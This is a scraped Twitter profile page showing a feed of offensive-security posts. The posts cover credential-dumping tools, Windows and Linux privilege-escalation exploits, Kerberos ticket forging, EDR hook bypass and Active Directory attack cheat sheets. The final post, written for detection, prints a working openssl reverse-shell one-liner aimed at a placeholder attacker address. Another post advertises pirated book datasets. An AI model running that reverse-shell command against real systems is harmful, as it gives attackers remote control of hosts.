L (@ldrloaddll)'s Twitter Profile
L

@ldrloaddll

f.

ID: 1429529127904702465

22-08-2021 19:41:47

257 Tweets

4 Followers

622 Following

Zak (@_zaksec)

If you're interested by an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks Will Schroeder, Lee Chagolla-Christensen and Oliver Lyak for their amazing work on ADCS!

k0shl (@keyz3r0)

So this is the blogpost about CVE-2022-22715 Windows Dirty Pipe, I share the root cause and exploitation on it, thanks all help from our KunlunLab and Adobe Product Security Incident Response Team. Enjoy!
Blog post: whereisk0shl.top/post/break-me-…
PoC: github.com/k0keoyo/my_vul…

Theori (@theori_io)

Our intern qwerty was destined to analyze a recent Linux kernel LPE vuln (CVE-2022-32250), a bug found and reported by fidgeting bits. Here's a brief write-up on the analysis of the bug and the exploit development. Check it out! blog.theori.io/research/CVE-2… (exploit included)

sn🥶vvcr💥sh (@snovvcrash)

🧵 (1/) Forged Tickets Thread Golden 🔑 tickets are no longer in fashion, so here’s a short memo on using Diamond 💎 (Charlie Clark) and Sapphire (Charlie Bromberg « Shutdown ») tickets with ticketer[.]py from #Impacket. At first let’s recap what we already know about Golden tickets ⤵️ #ad #kerberos

Orange Tsai 🍊 (@orange_8361)

The last part of A New Attack Surface on MS Exchange - #ProxyRelay is out! Have also left some final thoughts on the Closing part. Hope you all enjoy this journey :D blog.orange.tw/2022/10/proxyr…

x86matthew (@x86matthew)

SharedMemUtils - A simple tool to automatically find vulnerabilities in shared memory objects (commonly used for IPC in Windows services)
This tool immediately uncovered potential exploitation routes in both Nvidia and Dell Audio services on my system.
x86matthew.com/view_post?id=s…

mpgn (@mpgn_x64)

Dumping LSASS is such a 2020 move, let me introduce a new CrackMapExec module called Masky developed by Zak 🎉
If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT 🚀
Crazy module 🪂

an0n (@an0n_r0)

remote controlling windows services (useful for rce/lateral movement) is possible not only by interacting with SMB (445) but by calling MSRPC (135+49679) also. added (fixed?) the MSRPC version in the services[.]py example for impacket, here it is: github.com/tothi/impacket…

Mayfly (@m4yfly)

Welcome to the new AD Mindmap upgrade!
v2022_11 will be dark only (this is too painful to maintain two versions).
Thx again to: Viking and Hocine for their help 👍
Full quality and zoomable version here: orange-cyberdefense.github.io/ocd-mindmaps/i…
Overview:

Charlie Bromberg « Shutdown » (@_nwodtuhs)

Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑‍🍳 The Hacker Recipes thehacker.recipes/ad/movement/da…

GuidedHacking (@guidedhacking)

We are still looking to hire an extremely motivated reverse engineer to replace me as the main content creator of GH. You must be able to generate significant traffic and content at scale, ideally you would already have a YT channel which gets 10k+ view per video. GH has

an0n (@an0n_r0)

all you need to know about offensive #SCCM condensed into an awesome presentation including hands-on demos by X-Technobro from Black Hills Information Security: youtube.com/watch?v=W9PC9e…

Charlie Bromberg « Shutdown » (@_nwodtuhs)

Refreshed "pass the things" AD mindmap, the previous one was not in a dark theme (outrageous I know)
⏩ thehacker.recipes/ad/movement/nt…
💡 made with draw.io

SEKTOR7 Institute (@sektor7net)

Bypassing Crowdstrike Falcon EDR hooks with targeted algo, decomposing agent's hooking logic. Although extremely Falcon-specific, nevertheless good exercise for any maldev. Great work, inbits! #redteam inbits-sec.com/posts/in-memor…

TrustedSec (@trustedsec)

In our latest #blog, Principal Security Consultant Adam Chester 🏴‍☠️ discusses some of the post-exploitation techniques he finds useful in cloud environments, specifically #Okta. Read it now! hubs.la/Q022wWkX0

Yam Peleg (@yampeleg)

542.8 TB of high quality text:
LibGen RS - 72.8 TB - 6,738,687 txt files
Link: annas-archive.org/datasets/libge…
Sci-Hub - 87.2 TB - 97,847,479 txt files
Link: annas-archive.org/datasets/scihub
LibGen IL - 208.1 TB - 16,291,414 txt files
Link: annas-archive.org/datasets/libge…
Z-Library - 98.8 TB -

BlackWasp (@blwasp_)

Those bad boys got new guns:
- ADCS ESC12 & 13 and ESC8 from WSUS poisoning
- SCCM takeover from passive server
- AD Miner and SOAPHound
- LDAP pass back
- PXE boot attacks
- Creds from third-party softs
...
hideandsec.sh/books/cheatshe…
hideandsec.sh/books/cheatshe…
hideandsec.sh/books/cheatshe…

Sandfly Security (@sandflysecurity)

We're going to show you how to detect someone using the openssl binary on Linux as an encrypted backdoor for a living off the land technique:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s
